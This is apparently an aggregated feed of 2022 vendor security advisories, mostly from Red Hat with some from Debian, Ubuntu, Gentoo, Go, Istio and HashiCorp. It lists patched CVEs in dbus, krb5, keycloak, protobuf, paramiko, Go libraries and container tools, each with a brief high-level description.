RHSA-2022:8977: Red Hat Security Advisory: dbus security update

An update for dbus is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-42010: dbus: dbus-daemon crashes when receiving message with incorrectly nested parentheses and curly brackets
* CVE-2022-42011: dbus: dbus-daemon can be crashed by messages with array length inconsistent with element type
* CVE-2022-42012: dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with "foreign" endianness co...

RHSA-2022:8964: Red Hat Security Advisory: updated rh-sso-7/sso76-openshift-rhel8 container and operator related images

Updated rh-sso-7/sso76-openshift-rhel8 container image and rh-sso-7/sso7-rhel8-operator-bundle image are now available for RHEL-8 based Middleware Containers. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-3782: keycloak: path traversal via double URL encoding
* CVE-2022-3916: keycloak: Session takeover with OIDC offline refresh tokens

CVE-2022-41296: Multiple vulnerabilities affect IBM Db2® on Cloud Pak for Data and Db2 Warehouse® on Cloud Pak for Data

IBM Db2U 3.5, 4.0, and 4.5 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 237210.

CVE-2022-3259: Invalid Bug ID

Openshift 4.9 does not use HTTP Strict Transport Security (HSTS) which may allow man-in-the-middle (MITM) attacks.

Red Hat Security Advisory 2022-8781-01

Red Hat Security Advisory 2022-8781-01 - Logging Subsystem for Red Hat OpenShift has a security update. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2022-8847-01

Red Hat Security Advisory 2022-8847-01 - An update for protobuf is now available for Red Hat OpenStack Platform 16.2.4 (Train).

Red Hat Security Advisory 2022-8863-01

Red Hat Security Advisory 2022-8863-01 - Paramiko is a module for python 2.3 or greater that implements the SSH2 protocol for secure connections to remote machines. Unlike SSL, the SSH2 protocol does not require hierarchical certificates signed by a powerful central authority. You may know SSH2 as the protocol that replaced telnet and rsh for secure access to remote shells, but the protocol also includes the ability to open arbitrary channels to remote services across an encrypted tunnel.

RHSA-2022:8781: Red Hat Security Advisory: Logging Subsystem 5.5.5 - Red Hat OpenShift security update

Logging Subsystem 5.5.5 - Red Hat OpenShift. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2020-36518: jackson-databind: denial of service via a large depth of nested objects
* CVE-2022-2879: golang: archive/tar: unbounded memory consumption when reading headers
* CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters
* CVE-2022-27664: golang: net/http: handle server errors after sending GOAWAY
* CVE-2022-32189: golang: math/b...

RHSA-2022:8863: Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.9 (python-paramiko) security update

An update for python-paramiko is now available for Red Hat OpenStack Platform 16.1.9 (Train). Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2022-24302: python-paramiko: Race condition in the write_private_key_file function

RHSA-2022:8847: Red Hat Security Advisory: Red Hat OpenStack Platform 16.2.4 (protobuf) security update

An update for protobuf is now available for Red Hat OpenStack Platform 16.2.4 (Train). Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2021-22570: protobuf: Incorrect parsing of nullchar in the proto symbol leads to Nullptr dereference

RHSA-2022:8845: Red Hat Security Advisory: Red Hat OpenStack Platform 16.2.4 (python-paramiko) security update

An update for python-paramiko is now available for Red Hat OpenStack Platform 16.2.4 (Train). Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2022-24302: python-paramiko: Race condition in the write_private_key_file function

Red Hat Security Advisory 2022-8827-01

Red Hat Security Advisory 2022-8827-01 - Updated images are now available for Red Hat Advanced Cluster Security (RHACS). The updated image includes new features and bug fixes.

Red Hat Security Advisory 2022-8812-01

Red Hat Security Advisory 2022-8812-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

RHSA-2022:8812: Red Hat Security Advisory: dbus security update

An update for dbus is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2022-42010: dbus: dbus-daemon crashes when receiving message with incorrectly nested parentheses and curly brackets
* CVE-2022-42011: dbus: dbus-daemon can be crashed by messages with array length inconsistent with element type
* CVE-2022-42012: dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with "foreign" endianness co...

Red Hat Security Advisory 2022-8750-01

Red Hat Security Advisory 2022-8750-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. Issues addressed include denial of service and out of bounds read vulnerabilities.

Red Hat Security Advisory 2022-8626-01

Red Hat Security Advisory 2022-8626-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.11.17. Issues addressed include a denial of service vulnerability.

RHSA-2022:8669: Red Hat Security Advisory: krb5 security update

An update for krb5 is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2022-42898: krb5: integer overflow vulnerabilities in PAC parsing

RHSA-2022:8662: Red Hat Security Advisory: krb5 security update

An update for krb5 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2022-42898: krb5: integer overflow vulnerabilities in PAC parsing

RHSA-2022:8626: Red Hat Security Advisory: OpenShift Container Platform 4.11.17 packages and security update

Red Hat OpenShift Container Platform release 4.11.17 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.11. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header
* CVE-2022-27664: golang: net/http: handle server errors after sending GOAWAY
* CVE-2022-32148: golang: net/http/ht...

Red Hat Security Advisory 2022-8648-01

Red Hat Security Advisory 2022-8648-01 - Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center. Issues addressed include an integer overflow vulnerability.

Red Hat Security Advisory 2022-8634-01

Red Hat Security Advisory 2022-8634-01 - OpenShift API for Data Protection enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes.

Red Hat Security Advisory 2022-8641-01

Red Hat Security Advisory 2022-8641-01 - Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center. Issues addressed include an integer overflow vulnerability.

Red Hat Security Advisory 2022-8637-01

Red Hat Security Advisory 2022-8637-01 - Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center. Issues addressed include an integer overflow vulnerability.

RHSA-2022:8639: Red Hat Security Advisory: krb5 security update

An update for krb5 is now available for Red Hat Enterprise Linux 8.4 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2022-42898: krb5: integer overflow vulnerabilities in PAC parsing

RHSA-2022:8634: Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.1.1 security and bug fix update

OpenShift API for Data Protection (OADP) 1.1.1 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server
* CVE-2022-27664: golang: net/http: handle server errors after sending GOAWAY
* CVE-2022-30632: golang: path/filepath: stack exhaustion in Glob
* CVE-2022-30635: golang: encoding/gob: stack exhaustion in Decoder.Decode
* CVE-2022-32190: golang: net/url: JoinPath does not strip relative path components i...

Red Hat Security Advisory 2022-8535-01

Red Hat Security Advisory 2022-8535-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.16. Issues addressed include a denial of service vulnerability.

RHSA-2022:8534: Red Hat Security Advisory: OpenShift Container Platform 4.11.16 security update

Red Hat OpenShift Container Platform release 4.11.16 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.11. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2022-32189: golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service

Debian Security Advisory 5286-1

Debian Linux Security Advisory 5286-1 - Greg Hudson discovered integer overflow flaws in the PAC parsing in krb5, the MIT implementation of Kerberos, which may result in remote code execution (in a KDC, kadmin, or GSS or Kerberos application server process), information exposure (to a cross-realm KDC acting maliciously), or denial of service (KDC or kadmind process crash).

Red Hat Security Advisory 2022-8250-01

Red Hat Security Advisory 2022-8250-01 - The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.

Red Hat Security Advisory 2022-8008-01

Red Hat Security Advisory 2022-8008-01 - The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Issues addressed include denial of service and information leakage vulnerabilities.

Red Hat Security Advisory 2022-8098-01

Red Hat Security Advisory 2022-8098-01 - Toolbox is a tool for Linux operating systems, which allows the use of containerized command line environments. It is built on top of Podman and other standard container technologies from OCI.

Red Hat Security Advisory 2022-7970-01

Red Hat Security Advisory 2022-7970-01 - The protobuf packages provide Protocol Buffers, Google's data interchange format. Protocol Buffers can encode structured data in an efficient yet extensible format, and provide a flexible, efficient, and automated mechanism for serializing structured data.

Red Hat Security Advisory 2022-8057-01

Red Hat Security Advisory 2022-8057-01 - Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Issues addressed include cross site request forgery, cross site scripting, denial of service, information leakage, and privilege escalation vulnerabilities.

RHSA-2022:8250: Red Hat Security Advisory: grafana-pcp security update

An update for grafana-pcp is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header
* CVE-2022-30630: golang: io/fs: stack exhaustion in Glob
* CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read
* CVE-2022-30632: golang: path/filepath: stack exhaustion in Glob
* CVE-2022-30635: golang: encoding/gob: stack exhaustion in Decoder.Decode
* CVE...

RHSA-2022:8008: Red Hat Security Advisory: buildah security and bug fix update

An update for buildah is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2021-20291: containers/storage: DoS via malicious image
* CVE-2021-33195: golang: net: lookup functions may return invalid host names
* CVE-2021-33197: golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty
* CVE-2021-33198: golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very l...

RHSA-2022:7950: Red Hat Security Advisory: Image Builder security, bug fix, and enhancement update

An update for cockpit-composer, osbuild, osbuild-composer, and weldr-client is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2022-32189: golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service

RHSA-2022:7970: Red Hat Security Advisory: protobuf security update

An update for protobuf is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

* CVE-2021-22570: protobuf: Incorrect parsing of nullchar in the proto symbol leads to Nullptr dereference

Red Hat Security Advisory 2022-7464-01

Red Hat Security Advisory 2022-7464-01 - The protobuf packages provide Protocol Buffers, Google's data interchange format. Protocol Buffers can encode structured data in an efficient yet extensible format, and provide a flexible, efficient, and automated mechanism for serializing structured data.

RHSA-2022:7464: Red Hat Security Advisory: protobuf security update

An update for protobuf is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-22570: protobuf: Incorrect parsing of nullchar in the proto symbol leads to Nullptr dereference

RHSA-2022:7529: Red Hat Security Advisory: container-tools:3.0 security update

An update for the container-tools:3.0 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1708: cri-o: memory exhaustion on the node when access to the kube api * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter * CVE-...

RHSA-2022:7457: Red Hat Security Advisory: container-tools:rhel8 security, bug fix, and enhancement update

An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-36221: golang: net/http/httputil: panic due to racy read of persistConn after handler panic * CVE-2021-41190: opencontainers: OCI manifest and index parsing confusion * CVE-2022-1708: cri-o: memory exhaustion on the node when access to the kube api * CVE-2022-2990: buildah: possible information disclosure and modification * CVE-...

Ubuntu Security Notice USN-5704-1

Ubuntu Security Notice 5704-1 - It was discovered that DBus incorrectly handled messages with invalid type signatures. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service. It was discovered that DBus was incorrectly validating the length of arrays of fixed-length items. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service. It was discovered that DBus incorrectly handled the body of a DBus message with attached file descriptors. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service.

Red Hat Security Advisory 2022-7129-01

Red Hat Security Advisory 2022-7129-01 - Git Large File Storage replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server. Issues addressed include a denial of service vulnerability.

RHSA-2022:7129: Red Hat Security Advisory: git-lfs security and bug fix update

An update for git-lfs is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-28851: golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension * CVE-2020-28852: golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-27664: golang: net/http: handle server errors after sending GOAWA...

CVE-2022-41715: [security] Go 1.19.2 and Go 1.18.7 are released

Programs which compile regular expressions from untrusted sources may be vulnerable to memory exhaustion or denial of service. The parsed regexp representation is linear in the size of the input, but in some cases the constant factor can be as high as 40,000, making relatively small regexps consume much larger amounts of memory. After fix, each regexp being parsed is limited to a 256 MB memory footprint. Regular expressions whose representation would use more space than that are rejected. Normal use of regular expressions is unaffected.

CVE-2022-2880: net/http/httputil: ReverseProxy should not forward unparseable query parameters · Issue #54663 · golang/go

Requests forwarded by ReverseProxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After fix, ReverseProxy sanitizes the query parameters in the forwarded query when the outbound request's Form field is set after the ReverseProxy.Director function returns, indicating that the proxy has parsed the query parameters. Proxies which do not parse query parameters continue to forward the original query parameters unchanged.

CVE-2022-2879: archive/tar: unbounded memory consumption when reading headers · Issue #54853 · golang/go

Reader.Read does not set a limit on the maximum size of file headers. A maliciously crafted archive could cause Read to allocate unbounded amounts of memory, potentially causing resource exhaustion or panics. After fix, Reader.Read limits the maximum size of header blocks to 1 MiB.

CVE-2022-39278: Announcing Istio 1.13.9

Istio is an open platform-independent service mesh that provides traffic management, policy enforcement, and telemetry collection. Prior to versions 1.15.2, 1.14.5, and 1.13.9, the Istio control plane, istiod, is vulnerable to a request processing error, allowing a malicious attacker that sends a specially crafted or oversized message which results in the control plane crashing when the Kubernetes validating or mutating webhook service is exposed publicly. This endpoint is served over TLS port 15017, but does not require any authentication from the attacker. For simple installations, Istiod is typically only reachable from within the cluster, limiting the blast radius. However, for some deployments, especially external istiod topologies, this port is exposed over the public internet. Versions 1.15.2, 1.14.5, and 1.13.9 contain patches for this issue. There are no effective workarounds, beyond upgrading. This bug is due to an error in `regexp.Compile` in Go.

CVE-2022-41316: HCSEC-2022-24 - Vault's TLS Cert Auth Method Only Loaded CRL After First Request

HashiCorp Vault and Vault Enterprise’s TLS certificate auth method did not initially load the optionally configured CRL issued by the role's CA into memory on startup, resulting in the revocation list not being checked if the CRL has not yet been retrieved. Fixed in 1.12.0, 1.11.4, 1.10.7, and 1.9.10.

CVE-2022-42012: security - dbus denial of service: CVE-2022-42010, -42011, -42012

An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash by sending a message with attached file descriptors in an unexpected format.

Gentoo Linux Security Advisory 202209-26

Gentoo Linux Security Advisory 202209-26 - Multiple vulnerabilities have been discovered in Go, the worst of which could result in denial of service. Versions less than 1.18.6 are affected.

Red Hat Security Advisory 2022-6714-01

Red Hat Security Advisory 2022-6714-01 - Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS). The updated image includes new features and bug fixes.

Red Hat Security Advisory 2022-6560-01

Red Hat Security Advisory 2022-6560-01 - An update is now available for OpenShift Logging 5.3.12. Red Hat Product Security has rated this update as having a security impact of Moderate.

RHSA-2022:6560: Red Hat Security Advisory: Openshift Logging Bug Fix Release and Security Update (5.3.12)

An update is now available for OpenShift Logging 5.3.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read

GHSA-phjr-8j92-w5v7: CRI-O incorrect handling of supplementary groups may lead to sensitive information disclosure

Incorrect handling of the supplementary groups in the CRI-O container engine might lead to sensitive information disclosure or possible data modification if an attacker has direct access to the affected container where supplementary groups are used to set access permissions and is able to execute binary code in that container.

Red Hat Security Advisory 2022-6527-01

Red Hat Security Advisory 2022-6527-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains OpenShift Virtualization 4.11.0 RPMs.

RHSA-2022:6526: Red Hat Security Advisory: OpenShift Virtualization 4.11.0 Images security and bug fix update

Red Hat OpenShift Virtualization release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2021-44716: golang: net/http: limit growth of header canonicalization cache * CVE-2021-44717: golang: syscall: don't close fd 0 on ForkExec error * CVE-2022-1798: kubeVirt: Arbitrary file read on t...

CVE-2022-32190

JoinPath and URL.JoinPath do not remove ../ path elements appended to a relative path. For example, JoinPath("https://go.dev", "../go") returns the URL "https://go.dev/../go", despite the JoinPath documentation stating that ../ path elements are removed from the result.

CVE-2022-2990: Vulnerability in Linux containers – investigation and mitigation

Incorrect handling of the supplementary groups in the Buildah container engine might lead to sensitive information disclosure or possible data modification if an attacker has direct access to the affected container where supplementary groups are used to set access permissions and is able to execute binary code in that container.

RHSA-2022:6318: Red Hat Security Advisory: OpenShift Container Platform 4.9.48 extras security update

Red Hat OpenShift Container Platform release 4.9.48 is now available with updates to packages and images that fix several bugs. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS

RHSA-2022:6263: Red Hat Security Advisory: OpenShift Container Platform 4.6.61 security and extras update

Red Hat OpenShift Container Platform release 4.6.61 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS

RHSA-2022:6287: Red Hat Security Advisory: OpenShift Container Platform 4.11.3 packages and security update

Red Hat OpenShift Container Platform release 4.11.3 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.11. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS

Red Hat Security Advisory 2022-6345-01

Red Hat Security Advisory 2022-6345-01 - Multicluster engine for Kubernetes 2.1 images. Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds. You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2022-6347-01

Red Hat Security Advisory 2022-6347-01 - VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters. Version 0.5 has been released with security fixes and updates.

RHSA-2022:6370: Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.6.0 security updates and bug fixes

Red Hat Advanced Cluster Management for Kubernetes 2.6.0 General Availability release images, which fix security issues and bugs. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-28131: golang: encoding/xml: stack exhaustion in Decoder.Skip * CVE-2022-30629: golang: crypto/tls: session tickets lack random ticket_a...

CVE-2022-27664: [security] Go 1.19.1 and Go 1.18.6 are released

In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.

